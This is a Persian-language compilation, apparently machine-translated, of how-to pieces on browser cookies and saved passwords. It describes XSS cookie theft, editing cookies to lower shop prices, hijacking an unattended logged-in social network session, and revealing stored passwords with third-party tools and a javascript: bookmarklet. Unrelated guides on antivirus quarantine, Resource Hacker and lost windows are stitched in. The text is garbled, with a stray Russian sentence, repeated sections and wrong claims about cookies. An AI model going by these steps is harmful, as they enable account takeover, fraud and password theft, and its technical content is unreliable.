هکرها با دقت اسکریپت های XSS خود را "استتار" می کنند تا قربانی به چیزی مشکوک نشود. آنها پسوند فایل را تغییر می دهند، کد را به عنوان تصویر ارسال می کنند، آنها را تشویق می کنند که پیوند را دنبال کنند و با محتوای جالب آنها را جذب می کنند. در نتیجه: یک کاربر رایانه شخصی که قادر به کنترل کنجکاوی خود نیست، با دست خود (با یک کلیک ماوس) کوکی های جلسه (با ورود به سیستم و رمز عبور!) را برای نویسنده اسکریپت XSS - شرور رایانه ارسال می کند.

همه کوکی‌ها بدون هیچ تغییری - به شکل اصلی - با همان مقادیر، رشته‌ها و سایر داده‌ها، ذخیره می‌شوند و به سرور وب (که از آنجا آمده‌اند) ارسال می‌شوند. تغییر عمدی پارامترهای آنها را جایگزینی کوکی می گویند. به عبارت دیگر، هنگام جایگزینی کوکی‌ها، مهاجم وانمود می‌کند که یک تفکر آرزویی است. به عنوان مثال، هنگام پرداخت در یک فروشگاه آنلاین، کوکی مقدار پرداخت را به سمت پایین تغییر می دهد - بنابراین، "صرفه جویی" در خرید اتفاق می افتد.

کوکی‌های جلسه دزدیده شده در یک شبکه اجتماعی از حساب شخص دیگری در جلسه دیگری و در رایانه شخصی دیگر «درج» می‌شوند. مالک کوکی های دزدیده شده تا زمانی که قربانی در صفحه خود باشد، به حساب قربانی (مکاتبات، محتوا، تنظیمات صفحه) دسترسی کامل دارد.

"ویرایش" کوکی ها با استفاده از موارد زیر انجام می شود:

• عملکردهای "مدیریت کوکی ها..." در مرورگر اپرا.
• افزونه‌های مدیریت کوکی‌ها و مدیریت کوکی پیشرفته برای فایرفاکس.
• ابزارهای IECookiesView (فقط اینترنت اکسپلورر)؛
• یک ویرایشگر متن مانند AkelPad، NotePad یا Notepad ویندوز.

یک طرح پیاده سازی بسیار ساده، متشکل از چندین مرحله. اما تنها در صورتی مؤثر است که رایانه قربانی با یک جلسه باز، به عنوان مثال VKontakte، بدون مراقبت رها شود (و برای مدت طولانی!):

به عنوان یک قاعده، هکرها از ابزارهای بالا (+ ابزارهای دیگر) هم به صورت ترکیبی (از آنجایی که سطح حفاظت در بسیاری از منابع وب بسیار بالا است) و هم به طور جداگانه (زمانی که کاربران بیش از حد ساده لوح هستند) استفاده می کنند.

و مهمتر از همه، هنگام استراحت یا کار در اینترنت، هوشیاری و توجه خود را از دست ندهید!

کوکی‌ها برای کاربر نه تنها برای بارگذاری سریع‌تر صفحاتی که دائماً بازدید می‌کنند ضروری هستند. سرورهای راه دور به طور خودکار این یا سایر اطلاعات را در رایانه کاربر ذخیره می کنند تا در آینده کار با تبادل داده راحت باشد.

1. برای اطلاع از ورود و رمز عبور کاربر در سورس ها می توانید از فایل ها استفاده کنید. اگر از مرورگر موزیلا فایرفاکس استفاده می‌کنید و امکان ضبط کوکی‌ها فعال است، می‌توانید لاگین‌ها و رمزهای عبور ذخیره‌شده را مستقیماً در برنامه پیدا کنید. برای انجام این کار، در بالای صفحه در منوی مرورگر موردی به نام "ابزار" را کلیک کنید. تنظیمات سیستم را انتخاب کنید. یک پنجره بزرگ در مقابل شما ظاهر می شود که حاوی چندین تب است. به تب "امنیت" بروید.

2. در پنجره ای که ظاهر می شود، روی دکمه با عنوان "Saved Passwords" کلیک کنید. یک پنجره جدید با لیستی از لاگین هایی که در منابع مختلف ذخیره کرده اید در مقابل شما ظاهر می شود. بر روی دکمه "نمایش رمزهای عبور" کلیک کنید. همچنین می توانید با انتخاب یک رمز عبور در همان منو از این اطلاعات محافظت کنید.

3. اگر از مرورگر اپرا استفاده می کنید، فقط می توانید نام های کاربری را پیدا کنید. برای انجام این کار، مدیریت رمز عبور را در ابزارها باز کنید و به لاگین های موجود نگاه کنید. برای پیدا کردن رمز عبور ذخیره شده، نرم افزار اضافی مانند Opera Password Recovery را نصب کنید. در عین حال، به یاد داشته باشید که هیچ نرم افزار شخص ثالثی امنیت کامل داده های شخصی شما را تضمین نمی کند؛ بنابراین، رمزهای عبور خود را به طور مستقل به خاطر بسپارید یا از مرورگر دیگری استفاده کنید.

4. آیا می خواهید رمز عبور خود را در گوگل کروم مشاهده کنید؟ سپس با کلیک بر روی آیتم مربوطه در نوار ابزار، تنظیمات موجود در پارامترها را باز کنید. به بخش "پیشرفته" بروید و روی "نمایش کوکی ها" کلیک کنید.

5. اگر کاربر مرورگر استاندارد اینترنت اکسپلورر هستید، از ابزار اولیه BehindTheAsterisks برای استخراج رمز عبور استفاده کنید. این یک برنامه رایگان است که دارای رابط بصری است و امکان نمایش رمز عبور را به جای ستاره به صورت نمادها در اختیار کاربر قرار می دهد. این ابزار برای مرورگرهای دیگر نیز موجود است.

بسیاری از مرورگرهای مدرن دارای قابلیتی مانند به خاطر سپردن رمزهای عبور برای سایت های مختلف هستند. با یک بار وارد کردن رمز عبور خود را از پر کردن خط در هر بار ورود به سایت رها می کنید. اما اگر رمز عبور خود را فراموش کرده اید، و در پشت نقطه های وب سایت پنهان شده است، چه باید بکنید؟ برای پیدا کردن رمز عبور، باید دستورالعمل های بعدی را دنبال کنید.

1. ابتدا باید به سایتی که برای آن پسورد نیاز دارید بروید. روی "Password Wand" کلیک کنید. پس از پر شدن تمام فیلدها با ستاره یا نقطه، بلافاصله ESC را فشار دهید. پس از آن، کد زیر را در نوار آدرس وارد کنید: javascript:(function () (inp = document.getElementsByTagName('input'); for (var j = 0; j< inp.length; j++) { if (inp[j].type == ‘password’) { prompt(inp[j].name, inp[j].value); } } }) ()Нажав на ENTER, вы получите нужный пароль.

2. اگر روش اول کمک نکرد، می توانید از ابزار بازیابی رمز عبور Opera استفاده کنید. این برنامه ای است که برای تصحیح رمزهای عبور ذخیره شده در مرورگر اپرا طراحی شده است. این برنامه بسیار ساده و آسان برای استفاده است؛ تنها کاری که باید انجام دهید این است که آن را اجرا کنید و سپس بر روی گزینه Correct Passwords کلیک کنید. همه رمزهای عبور شناسایی شده در فایل های متنی یا گزارش های HTML ذخیره می شوند.

همه مرورگرهای مدرن گزینه ای برای پاک کردن فایل های موقت از جمله کوکی ها دارند. اما گاهی اوقات لازم نیست که به طور کامل پاک کنید، بلکه باید کوکی های ذخیره شده توسط مرورگر را به طور انتخابی مشاهده، ویرایش و حذف کنید. در زیر خلاصه ای از دسترسی به این گزینه در مرورگرهای به خصوص معروف آورده شده است.

1. در مرورگر اپرا، برای دسترسی به هر کوکی که ذخیره می کند، باید به بخش "تنظیمات" در "منوی اصلی" بروید و مورد "تنظیمات عمومی..." را در آنجا انتخاب کنید (یا کلید ترکیبی CTRL + را فشار دهید. F12). در نتیجه، پنجره تنظیمات مرورگر باز می شود، که در آن باید به تب "پیشرفته" بروید، بخش "کوکی ها" را در پانل سمت چپ انتخاب کنید و روی دکمه "مدیریت کوکی ها" کلیک کنید.

2. در Opera، در پنجره مدیریت کوکی ها، می توانید آنچه را که نیاز دارید پیدا کنید، آن را انتخاب کنید و روی دکمه "Edit" کلیک کنید تا محتویات ورودی را مشاهده کنید. در صورت تمایل می توانید کوکی را ویرایش کنید.

3. در موزیلا فایرفاکس، برای دسترسی به کوکی ها، باید بخش «ابزار» را در منو انتخاب کنید و روی «تنظیمات» در آن کلیک کنید. در پنجره تنظیمات، به تب "Privacy" بروید و روی دکمه ای که می گوید "Show Cookies..." کلیک کنید. در نتیجه پنجره ای با لیستی از کوکی های ذخیره شده باز می شود که در آن می توانید محتویات آنها را جستجو و مشاهده کنید.

4. در اینترنت اکسپلورر، مسیر ذخیره کوکی از طریق بخش منو به نام "ابزار" و آیتم "گزینه های اینترنت" در آن است. با کلیک بر روی این مورد، پنجره ای باز می شود که در آن باید در برگه "عمومی" روی یکی از دکمه های "گزینه ها" واقع در بخش "سابقه مرور" کلیک کنید. پس از این، پنجره زیر با عنوان "گزینه های فایل موقت" باز می شود که در آن باید روی دکمه "نمایش فایل ها" کلیک کنید.

5. با استفاده از این روش در اینترنت اکسپلورر به پوشه ای که تمامی فایل های موقت در آن ذخیره شده اند هدایت می شوید. اگر روی سرصفحه ستون "Name" کلیک کنید، فایل ها بر اساس نام مرتب می شوند و همه کوکی ها در یک بلوک گروه بندی می شوند. می توانید مورد نیاز خود را پیدا کنید و آن را برای مشاهده و ویرایش در یک ویرایشگر متن معمولی باز کنید.

6. مرورگر گوگل کروم طولانی ترین توالی اقدامات را برای دسترسی به کوکی ها دارد. ابتدا باید روی نماد آچار در گوشه سمت راست بالای پنجره کلیک کنید و گزینه "Options" را در منو انتخاب کنید. با این کار صفحه تنظیمات باز می شود که در قسمت سمت چپ آن باید روی پیوند Advanced کلیک کنید. در صفحه تنظیمات پیشرفته، روی دکمه «تنظیمات فهرست مطالب» کلیک کنید تا پنجره جدیدی باز شود.

7. در پنجره جدید، باید روی دکمه «همه کوکی‌ها و داده‌های سایت» کلیک کنید. این مقصد نهایی در انتقال به کوکی های ذخیره شده توسط مرورگر خواهد بود.

8. در گوگل کروم می توانید کوکی ها را مشاهده و حذف کنید.

9. در مرورگر سافاری، برای دسترسی به کوکی‌ها، باید روی نماد در گوشه بالا سمت راست کلیک کنید - نمادی که دارای چرخ دنده است. در منو، "تنظیمات..." را انتخاب کنید که پنجره جدیدی باز می شود. در آن باید به برگه "امنیت" بروید و روی دکمه "نمایش کوکی ها" کلیک کنید. در سافاری فقط می توانید کوکی ها را جستجو و حذف کنید.

ویدئو در مورد موضوع

برنامه های مرورگر مدرن همه چیز را برای ما به یاد می آورند: صفحات مورد علاقه ما، همه چیزهایی که برای مدت طولانی بازدید کرده ایم، رمزهای عبور برای انواع سایت ها - نامه، بازی ها، شبکه های عمومی. چقدر راحت است که به سایت بروید و دیگر به فکر وارد کردن لاگین و رمز عبور خود نباشید! اما گاهی اوقات مجبور می شوید سیستم را مجدداً نصب کنید و همه رمزهای عبور را از حافظه برنامه به حافظه خود بازگردانید.

شما نیاز خواهید داشت

• - کامپیوتر با دسترسی به اینترنت
• - مرورگر

1. برنامه موزیلا فایرفاکس را اجرا کنید و برای بازیابی رمز عبور ذخیره شده در این مرورگر، دستور “Tools” را اجرا کنید. آیتم منوی «تنظیمات» را انتخاب کنید، به برگه «امنیت» بروید، روی دکمه «گذرواژه‌های ذخیره شده» کلیک کنید. در این پنجره، تمام رمزهای عبور ذخیره شده در مرورگر را مشاهده کنید، رمز مورد نیاز خود را انتخاب کنید و روی "نمایش" کلیک کنید.

2. دانلود برنامه ای که به شما امکان می دهد رمزهای عبور ذخیره شده را در برنامه Opera نشان دهید - UnWand - برنامه ای برای مشاهده رمزهای عبور (Wand - Wand) در Opera و همچنین بازیابی رمز عبور Opera 3.5.1.225 تشخیص آن دشوار نخواهد بود. . برنامه را روی کامپیوتر خود نصب کنید، برنامه را اجرا کنید. گزینه تصحیح رمز عبور مورد نیاز را انتخاب کنید: به صورت مکانیکی از یک عصا، به صورت مکانیکی از پست، به صورت دستی از یک عصا، به صورت دستی از ایمیل، گزینه ترکیبی. روی دکمه "بعدی" کلیک کنید. یک پنجره اسکن ظاهر می شود، در پنجره بعدی باید محل برنامه Opera را مشخص کنید و روی next کلیک کنید. برنامه این پوشه را اسکن کرده و پسوردهای ذخیره شده را نمایش می دهد.

3. برنامه ای را دانلود کنید که می تواند رمزهای عبور را در مرورگر نشان دهد، نه تنها در اپرا یا موزیلا، بلکه در بسیاری از مرورگرهای دیگر - Multi Password Recovery. برای دانلود، به وب سایت رسمی برنامه - http://passrecovery.com/ru/index.php بروید. این برنامه را دانلود و بر روی کامپیوتر خود نصب کنید. در حین نصب، برنامه از شما می خواهد که به روز رسانی را بررسی کنید، روی "OK" کلیک کنید. برنامه را از منوی اصلی اجرا کنید. یک منو در سمت چپ نمایش داده می شود که در آن باید برنامه مورد نیاز را برای بازیابی رمز عبور خود انتخاب کنید. به عنوان مثال، مرورگر اینترنت اکسپلورر، آن را از لیست انتخاب کنید و رمزهای عبور ذخیره شده در این مرورگر در سمت راست پنجره برنامه نشان داده می شود.

4. برای بازیابی رمز عبور خود از مرورگر با استفاده از برنامه دیگری، به وب سایت http://www.nirsoft.net/ بروید، هر برنامه ای را انتخاب کنید و از آنجا دانلود کنید. عملکرد آنها مشابه برنامه های قبلی است که توضیح داده شد.

تقریباً همیشه، برای حفظ حریم خصوصی هنگام وارد کردن رمزهای عبور، برنامه های مربوطه به جای کاراکترهای وارد شده، کاراکترهای غیرقابل خواندن - "ستاره" را نمایش می دهند. با این حال، اگر همین ستاره ها را در قسمت ورود رمز عبور مشاهده کردید، به این معنی نیست که رمز عبور واقعاً در این قسمت قرار گرفته است. اغلب، چنین ستاره هایی چیزی را پنهان نمی کنند، اما یک عملکرد صرفا اطلاعاتی دارند - تا متوجه شوید که وقتی رمز عبور را وارد می کنید، از چشمان کنجکاو پنهان می شود.

1. از قصد رمزگشایی ستاره ها در صفحات وب دریافتی از سرور صرف نظر کنید. در اکثر موارد رمز عبور توسط سرور به مرورگر کاربر منتقل نمی شود. شما می توانید این را با باز کردن کد صفحه اولیه دریافت شده توسط مرورگر وب خود تأیید کنید - رمز عبور، چه به صورت واضح و چه به صورت رمزگذاری شده، وجود ندارد. رمز عبور از طریق اینترنت تنها در یک جهت منتقل می شود - از مرورگر به سرور.

2. از برخی برنامه های کاربردی تخصصی استفاده کنید که می توانند رمزهای عبور را در پنجره های باز سایر برنامه ها بخوانند. چنین ابزارهایی به عنوان بخشی از اجزای خدمات سیستم عامل وجود ندارد. این غیرعادی است که یک برنامه رمزگشایی با برنامه های امنیتی رمز عبور همراه شود. برنامه مورد نیاز به راحتی در اینترنت پیدا می شود - به عنوان مثال، می تواند Pass Checker باشد. این برنامه از شش فایل (شامل یک فایل راهنما) با وزن کلی 296 کیلوبایت تشکیل شده است و نیازی به نصب ندارد. بلافاصله پس از ذخیره فایل ها در یک هارد دیسک یا رسانه های قابل جابجایی، می توانید با دوبار کلیک کردن بر روی فایل Password.exe آن را اجرا کنید.

3. برنامه ای را که به ستاره های آن اهمیت می دهید باز کنید. پس از آن، پنجره Pass Checker را در بالای برنامه باز قرار دهید و با دکمه سمت چپ ماوس، تصویر جمجمه را با پسورد پنهان شده با ستاره به داخل فیلد بکشید. این فیلد با یک قاب چشمک زن برجسته می شود و در پنجره Pass Checker در مقابل متن پنجره، رمزگشا رمز عبور را به صورت رمزگذاری نشده قرار می دهد. این رمز عبور به هر شکلی که بخواهید قابل کپی و استفاده است.

4. اگر می‌خواهید از روش‌های سخت‌تر رمزگشایی رمز عبور استفاده کنید، روی دکمه Help در ردیف پایین دکمه‌ها کلیک کنید. علاوه بر موارد ساده ای که در مرحله قبل توضیح داده شد، این برنامه دو گزینه دیگر را ارائه می دهد. با وجود رابط انگلیسی زبان، راهنمای Pass Checker به زبان روسی نوشته شده است، بنابراین هیچ مشکلی در ترجمه وجود نخواهد داشت.

ویدئو در مورد موضوع

روش استخراج فایل هایی که به طور تصادفی منتقل شده اند از قرنطینه اکثریت قریب به اتفاق برنامه های آنتی ویروس، کم و بیش استاندارد شده است و فقط در جزئیات متفاوت است. در این مورد، عملیات تعمیر فایل های قرنطینه شده برنامه های Microsoft Security Essentials، Norton و Avast Antivirus را در نظر می گیریم.

شما نیاز خواهید داشت

• - الزامات ایمنی مایکروسافت؛
• - آواست! آنتی ویروس رایگان 5.0;
• - امنیت اینترنتی نورتن

1. اپلیکیشن Microsoft Security Essentials را راه اندازی کنید و برای انجام عملیات استخراج فایل ها از قرنطینه، به تب “Log” در پنجره اصلی برنامه بروید.

2. مورد "اقلام قرنطینه" را انتخاب کنید و روی دکمه "View data" در کادر گفتگوی باز شده کلیک کنید.

3. رمز عبور مدیر کامپیوتر را در پنجره درخواستی که ظاهر می شود وارد کنید و فایل مورد نظر برای تعمیر از قرنطینه را در لیست مشخص کنید.

4. برای تکمیل فرآیند استخراج فایل، روی دکمه «بازیابی» کلیک کنید، یا از دکمه «حذف همه» برای پاک کردن کامل قرنطینه برنامه آنتی ویروس Microsoft Security Essentials استفاده کنید.

5. آیتم منوی "Maintenance" را در پنجره اصلی برنامه آنتی ویروس avast انتخاب کنید. آنتی ویروس 5.0 را رایگان کنید و به تب "قرنطینه" در کادر گفتگوی باز شده بروید.

6. منوی زمینه فایل مورد تعمیر را در لیست سمت راست پنجره برنامه فراخوانی کنید و دستور Recover را برای استخراج فایل انتخابی به محل ذخیره اصلی مشخص شده در قسمت Initial location مشخص کنید.

7. مورد «قرنطینه» را در پنجره «Security Log» برنامه آنتی ویروس اینترنت سکیوریتی Norton انتخاب کنید و روی دکمه Options کلیک کنید تا عملیات تصحیح فایلی که در قرنطینه قرار گرفته است انجام شود.

8. فایل مورد نیاز را مشخص کرده و در پنجره باز شده “Danger found” دستور “Restore this file” را انتخاب کنید.

9. روی دکمه «بله» در کادر محاوره‌ای جدید «تعمیر از قرنطینه» کلیک کنید و با کلیک روی دکمه «بستن» عملیات تصحیح را کامل کنید.

توجه داشته باشید!
حذف فایل ها از قرنطینه فقط در صورتی مجاز است که کاملاً از بی ضرر بودن آنها مطمئن باشید!

مشاوره مفید
لازم به یادآوری است که "قرنطینه" یک پوشه ویژه است که توسط یک برنامه آنتی ویروس ایجاد شده است. فایل های قرنطینه شده به طور کامل از سیستم عامل جدا شده و برای فرآیندهای خارجی غیرقابل دسترسی هستند. آنها نمی توانند راه اندازی شوند، که ایمنی ذخیره سازی آنها را تضمین می کند.

سیستم عامل ویندوز مکانیزم استانداردی برای معرفی داده های دلخواه به کتابخانه های پویا و ماژول های اجرایی و همچنین یک API برای کار با آنها دارد. تصاویر، جداول رشته، دیالوگ های نمونه، نوار ابزار، منوها و سایر اطلاعات به عنوان منبع به ماژول های PE اضافه می شوند. گاهی اوقات، برای اهداف مختلف، نیاز به استخراج منابع از یک ماژول کامپایل شده است.

شما نیاز خواهید داشت

• یک برنامه رایگان منبع هکر است که برای دانلود در rpi.net.au/~ajohnson/resourcehacker موجود است.

1. فایل ماژول PE را در Resource Hacker آپلود کنید. در منوی اصلی برنامه، مرحله به مرحله روی گزینه File و Open کلیک کنید یا کلیدهای ترکیبی Ctrl+O را روی صفحه کلید خود فشار دهید. گفتگوی باز کردن فایل نمایش داده خواهد شد. به دایرکتوری که فایل مورد نظر در آن قرار دارد بروید. ماژول PE را در فهرست کاتالوگ انتخاب کنید. روی دکمه "باز کردن" کلیک کنید.

2. فهرست منابعی که باید کشیده شوند را تعیین کنید. پس از بارگذاری فایل PE، یک ساختار درختی در سمت چپ پنجره اصلی Resource Hacker نمایش داده می شود. این لیستی از همه منابع ماژول است که بر اساس نوع گروه بندی شده اند. بنابراین، به عنوان مثال، منابع گفتگو در بخش گفتگو، منابع مکان نما - در بخش مکان نما و گروه مکان نما، نمادها - در بخش نمادها و گروه آیکون ها قرار می گیرند. گره های لایه دوم سلسله مراتب، در کل بخش، شناسه های عددی یا نمادین منابع هستند. آنها را گسترش دهید و عناصر تودرتو را برجسته کنید. در این صورت منابع مربوطه به تصویر کشیده خواهد شد. نمادها، مکان نماها و رسترها به صورت تصویر در پانل سمت راست پنجره اصلی برنامه نمایش داده می شوند. برای جداول رشته‌ای، شتاب‌دهنده‌ها، اطلاعات نسخه، دیالوگ‌های نمونه، منوها، نوار ابزار، کد ساخته شده و در قالبی مناسب برای استفاده با کامپایلر RCC نمایش داده می‌شود. علاوه بر این، دیالوگ های نمونه در یک پنجره شناور جداگانه تجسم می شوند.

3. فرآیند ذخیره منابع کشف شده در مرحله قبل را شروع کنید. عنصر مورد نیاز را در ساختار درختی سمت چپ انتخاب کنید. بخش Action را در منوی اصلی برنامه باز کنید. مورد مربوط به عملیات ذخیره از نوع مخصوصا مناسب را انتخاب کنید.اگر می خواهید منبع را به شکل قطعه ای از داده های باینری ذخیره کنید که مشابه آنچه در ماژول PE وجود دارد، مورد "ذخیره منبع به عنوان یک فایل باینری ..." را انتخاب کنید. برای خرید فایلی که حاوی نسخه کامپایل شده منبع برجسته شده است، "ذخیره منبع به عنوان فایل *. res ..." را انتخاب کنید. یک فایل مشابه برای پیوند با یک برنامه کاربردی یا کتابخانه مناسب است. روی مورد با متنی مانند "ذخیره [نام بخش: نام زیربخش: نام منبع] ..." کلیک کنید تا منابع به شکل اصلی آنها استخراج شود. این آیتم منو باید برای استخراج فایل های نمادها، مکان نماها و تصاویر استفاده شود.

4. منابع را بیرون بکشید. در گفتگو با عنوان "ذخیره منبع در..."، نام و فهرست فایلی که قرار است ذخیره شود را مشخص کنید. روی دکمه "ذخیره" کلیک کنید.

گاهی اوقات، در سیستم عامل ویندوز، اتفاق عجیبی برای یک پنجره از برنامه‌ها می‌افتد: وقتی کوچک‌سازی می‌شود و به هر صفحه باز می‌شود، رفتار آن معمولی است، اما در یک پنجره با اندازه متوسط، برنامه در خارج از ناحیه قابل مشاهده ناپدید می‌شود. صفحه نمایش روش هایی برای بازیابی پنجره ای که از دسکتاپ شما خارج شده است وجود دارد و آنقدرها هم سخت نیستند.

شما نیاز خواهید داشت

• سیستم عامل ویندوز

1. اولین روش استخراج یک شی از یک منطقه قابل توجه، سپردن تمام عملیات دستی برای موقعیت یابی آن به خود سیستم عامل است. برای انجام این کار، علاوه بر پنجره مشکل، یک پنجره دیگر که متعلق به هر برنامه ای است را باز کنید - مثلاً Explorer را راه اندازی کنید. پس از آن، روی فضای خالی نوار وظیفه کلیک راست کنید تا منوی زمینه ظاهر شود. به سیستم عامل دستوری بدهید تا پنجره های باز را با استفاده از یکی از روش های فهرست شده در منو - "Windows in a Cascade"، "Display windows in a stack" یا "Display windows در کنار هم" سازماندهی کند. پس از این، رفتار پنجره گم شده به حالت عادی باز می گردد.

2. روش دیگر استفاده از کنترل صفحه کلید برای موقعیت یابی پنجره است. پس از روشن کردن، دیگر نیازی نیست که با اشاره گر ماوس به عنوان پنجره برسید تا بتوانید آن را جابجا کنید. برای فعال کردن این حالت، کلید ترکیبی Alt + Space + P را فشار دهید. پس از آن، با استفاده از کلیدهای جهت نما، پنجره مخفی را به قسمت قابل مشاهده دسکتاپ منتقل کنید. برای غیرفعال کردن حالت موقعیت یابی صفحه کلید، در هر نقطه کلیک چپ کنید.

3. روش 3 - کشش فضای موجود دسکتاپ. این را می توان با افزایش وضوح صفحه انجام داد. اگر از آخرین نسخه‌های ویندوز 7 یا ویستا استفاده می‌کنید، روی تصویر پس‌زمینه روی دسکتاپ خود کلیک راست کرده و موردی به نام «رزولوشن صفحه» را از منوی زمینه باز شده انتخاب کنید. سیستم عامل یکی از اپلت‌های «کنترل پنل» را راه‌اندازی می‌کند، جایی که باید فهرست کشویی «Resolution» را باز کنید و نوار لغزنده را به بالا یا بهتر است به علامت بالای آن ببرید. بعداً روی دکمه «اعمال» کلیک کنید. اپلت وضوح را تغییر می دهد و تایمر را شروع می کند، پس از آن این دگردیسی لغو می شود. در مدت زمان تعیین شده، باید دکمه را فشار دهید تا عملیات تایید شود. پس از انجام این کار، پنجره گم شده را پیدا کنید، آن را به مرکز دسکتاپ منتقل کنید و وضوح صفحه را به مقدار قبلی خود برگردانید.

در میان اطلاعات موجود در کوکی ها، داده های شناسایی کاربر اغلب مورد تقاضا هستند. ورود و رمز عبور را در منابع اینترنتی که داده های محرمانه بازدیدکنندگان خود را ذخیره می کنند، بیابید.

شما نیاز خواهید داشت

• - رایانه ای که سیستم عامل ویندوز را اجرا می کند.
• - دسترسی به اینترنت؛
• – مرورگرهای وب: موزیلا فایرفاکس، اپرا، اینترنت اکسپلورر، گوگل کروم؛
• – برنامه بازیابی رمز عبور اپرا؛
• – ابزار BehindTheAsterisks.

1. اگر از مرورگر موزیلا فایرفاکس برای مشاهده صفحات وب با عملکرد ضبط کوکی فعال در تنظیمات استفاده می کنید، لاگین ها و رمزهای عبور ذخیره شده خود را به راحتی در نرم افزار پیدا کنید. مرورگر اینترنت خود را راه اندازی کنید، "Tools" را باز کنید و به تنظیمات سیستم بروید. در پنجره ای که ظاهر می شود، حاوی چندین تب، گزینه "امنیت" را فعال کنید.

2. روی دکمه "Saved Passwords" در قسمت ظاهر شده کلیک کنید و به صفحه مرورگر وب جدید بروید. دارای کاراکترهای شناسایی است که هنگام بازدید از منابع مختلف اینترنتی در حافظه رایانه ذخیره می شود. روی خط "نمایش رمزهای عبور" کلیک کنید. شما می توانید از اطلاعات محرمانه خود محافظت کرده و رمز عبور را در همان منوی مرورگر تنظیم کنید.

3. در صورت بازدید از منابع شبکه جهانی با استفاده از مرورگر معروف Opera، نام های کاربری را بیابید. منوی Tools را در بالای مرورگر وب خود باز کنید، از Password Manager استفاده کنید و لیست ورود کاربران را مشاهده کنید.

4. برای دسترسی به رمزهای عبور ذخیره شده، نرم افزار اضافی را نصب کنید و برای این منظور برنامه Opera Password Recovery را ترجیح دهید. لطفاً به یاد داشته باشید که برنامه شخص ثالث ایمنی کامل داده های شخصی شما را تضمین نمی کند.

5. هنگام مشاهده رمزهای عبور در مرورگر گوگل کروم، گزینه مربوطه را در نوار ابزار مرورگر باز کنید. به تنظیمات پیشرفته بروید و گزینه "نمایش کوکی ها" را فعال کنید.

6. از ابزار رایگان چند منظوره با رابط قابل دسترسی ناخودآگاه، BehindTheAsterisks استفاده کنید و رمزهای عبور را در کوکی های مرورگر استاندارد اینترنت اکسپلورر بیابید. به گزینه های برنامه بروید تا کلمات رمز را به جای ستاره به صورت نماد نمایش دهید و به رمزهای عبور دسترسی پیدا کنید.

کوکی‌ها فایل‌هایی هستند که در رایانه شخصی کاربر ذخیره می‌شوند و حاوی اطلاعاتی درباره سایت‌هایی هستند که او تا به حال بازدید کرده است. با پشتیبانی از کوکی ها، می توانید متوجه شوید که کاربر از کدام صفحات بازدید کرده است.

کوکی‌ها فایل‌هایی هستند که حاوی اطلاعاتی درباره سایت‌هایی هستند که تاکنون بازدید کرده‌اند و در رایانه کاربر ذخیره می‌شوند. یعنی زمانی که کاربر از هر منبع وب بازدید می کند، اطلاعات مربوط به او در کوکی ها ثبت می شود و پس از بازدید بیشتر از این سایت، به وب سرور منتقل می شود.

کوکی ها حاوی اطلاعات مختلفی هستند، به عنوان مثال رمزهای عبور حساب در وب سایت ها، رنگ نمونه، اندازه فونتی که کاربر برای سایت ایجاد کرده است و غیره. واضح ترین مثال از نحوه استفاده از کوکی ها برای ذخیره تنظیمات توسط موتور جستجوی گوگل ارائه شده است. این دستگاه امکان سفارشی کردن نتایج جستجوی شما را فراهم می کند، ما در مورد تعداد نتایج در صفحه، فرمت صفحات بازگشتی، زبان رابط و سایر تنظیمات صحبت می کنیم. در مورد گذرواژه‌های حساب‌ها در وب‌سایت‌ها، هر کاربر بیش از یک بار متوجه شده است که یک بار ورود و رمز عبور خود را در برخی از منابع وب مشخص کرده است، در هنگام تأیید مجدد این کار را انجام نداده است، زیرا این اطلاعات مربوط به سایت به صورت مکانیکی در کوکی‌ها ثبت شده است. . هنگامی که منبع دوباره بازدید می شود، داده ها به وب سرور ارسال می شود، که به طور مکانیکی کاربر را شناسایی می کند و او را از پر کردن مجدد فیلدها آزاد می کند. کوکی ها همچنین می توانند برای حفظ آمار مفید باشند. کوکی ها نمی توانند هیچ خطری برای رایانه شما ایجاد کنند. این فقط داده های متنی برای همه است که نمی تواند به او آسیب برساند. با پشتیبانی از کوکی ها، حذف، انتقال یا خواندن اطلاعات از رایانه شخصی کاربر غیرممکن است، با این حال، می توان متوجه شد که وی از کدام صفحات بازدید کرده است. مرورگرهای مدرن با سهولت بیشتری در اختیار کاربر قرار می‌دهند که کوکی‌ها را ذخیره کند یا نه، اما اگر او تصمیم گرفت ذخیره کوکی‌ها را غیرفعال کند، باید در کار با برخی از سایت‌ها برای هک کردن آماده باشد.

اول اینکه کوکی ها همیشه نمی توانند به درستی کاربر را شناسایی کنند. ثانیاً، آنها می توانند توسط یک مجرم دزدیده شوند. در مورد تشخیص نادرست، دلیل این امر ممکن است استفاده از چندین مرورگر توسط کاربر باشد. هر مرورگر فضای ذخیره‌سازی مخصوص به خود را دارد، بنابراین کوکی‌ها کاربر را شناسایی نمی‌کنند، بلکه مرورگر و رایانه شخصی او را شناسایی می‌کنند و اگر چندین مرورگر داشته باشد، چندین مجموعه کوکی وجود خواهد داشت. مهاجمان ممکن است با تبادل مداوم کوکی‌ها بین مرورگر کاربر و وب سرور جذب شوند؛ اگر ترافیک شبکه رمزگذاری نشده باشد، می‌توان کوکی‌های کاربر را با کمک برنامه‌های sniffer ویژه خواند. این مشکل با رمزگذاری ترافیک و استفاده از پروتکل های مختلف قابل حل است.

ویدئو در مورد موضوع